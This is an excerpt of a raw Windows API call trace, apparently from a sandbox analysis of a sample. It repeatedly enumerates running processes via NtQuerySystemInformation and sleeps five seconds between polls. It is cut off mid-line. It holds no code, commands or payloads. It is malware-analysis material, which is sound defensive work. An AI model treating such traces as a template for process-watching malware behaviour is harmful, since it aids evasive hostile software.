[0260.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.676] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.680] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.685] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.686] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.688] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.693] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.696] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.700] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.706] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.706] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.714] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.720] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.720] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.723] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.723] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.728] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.735] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.743] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.744] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.751] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.757] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.760] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.760] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.764] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.771] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.777] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.785] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.787] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.787] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.792] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.794] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.800] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.806] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.807] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.814] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.816] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.817] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, 